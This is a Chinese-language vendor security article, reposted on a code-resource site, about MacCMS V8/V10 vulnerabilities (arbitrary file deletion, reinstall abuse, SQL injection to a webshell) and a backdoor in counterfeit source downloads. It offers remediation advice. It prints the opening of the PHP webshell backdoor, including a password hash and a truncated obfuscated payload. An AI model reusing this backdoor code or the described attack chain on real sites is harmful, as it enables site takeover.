最新公告
  • 欢迎您光临玖居暗巷,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法

    目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁。

    目前maccms官方被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 苹果官方网站因为特殊原因已经停止访问,该内容被禁止访问,但是升级补丁更新的网址还是可以打开的。

    截图如下:

    苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法-玖居暗巷

    苹果CMS漏洞详情:

    苹果CMS V8 V10版本存在代码重装漏洞,以及代码后门漏洞,任意文件删除漏洞,通过CNVD-2019-43865的信息安全漏洞通报,可以确认maccms V10存在漏洞,可以伪造恶意代码发送到网站后端进行执行,可以删除网站目录下的任意文件,可删除重装苹果CMS系统的配置文件,导致可以重新安装maccms系统,并在安装过程中插入sql注入代码到数据库中去执行并获取webshell以及服务器权限。

    苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法-玖居暗巷

    苹果CMS V8 V10 源代码存在后门漏洞,经过我们SINE安全技术的检测发现,存在后门的原因是,目前百度搜索苹果官网,maccms官方,排在百度搜索首页的都是仿冒的网站,真正官网地址是www.maccms.com,包括模板,图片,以及CSS跟真正的官方是一模一样,很多客户都是点击到这个山寨网站上去进行下载的源代码,该代码里隐藏了木马后门文件,阿里云都无法检测出来,

    error_reporting(E_ERROR);

    @ini_set('display_errors','Off');

    @ini_set('max_execution_time',20000);

    @ini_set('memory_limit','256M');

    header("content-Type: text/html; charset=utf-8");

    $password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

    define('Viv, bebegim.','Denzel-你的英雄'); // 标题

    function s(){

    $str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

    7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

    代码如上面所示,是加密过的,经过我们SINE安全的解密发现是PHP的脚本木马,可以绕过各大服务器厂商的安全检测,包括阿里云,腾讯云,百度云,华为云。

    关于苹果CMS网站漏洞的修复方案与办法

    对任意文件删除漏洞做安全过滤与检查,防止del删除的语句的执行,对前端传输过来的参数进行严格的检测,不管是get,post,cookies,如果您对代码不是太懂的话也可以找专业的网站安全公司来处理解决苹果CMS网站被攻击的问题,或者是对重装文件进行改名以及安装配置文件进行权限设置,只读权限,对于存在网站木马后门的苹果cms系统,人工对代码进行安全审计,对所有网站目录下每个代码文件都要仔细的排查,可以下载官方的源代码进行比对。

     

     

    ①本站资源仅用于学习和交流,勿用于商业。切勿私自传播于网络,将会追究法律责任。
    ②本站其他资源来源网络或者用户投稿,供学习交流之用。如有侵权请联系删除。
    ③如有链接无法下载、失效或广告,请联系管理员处理!
    ④本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
    ⑤如果你也有好源码或者教程,可以到审核区发布,分享有本站专属货币奖励和额外收入!
    ⑥如遇到加密压缩包,默认解压密码为"jiuqing97.top",如遇到无法解压的请联系管理员!

    玖居暗巷 » 苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于网页模版、APP源码等类型的资源,文章内用于介绍的图片通常并不包含在对应可供下载资源包内。这些相关商业资源需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些文件也是这种情况,但部分资源会在资源包内有一份下载链接清单。
    玖居暗巷
    一个高级程序员模板开发平台

    Leave a Reply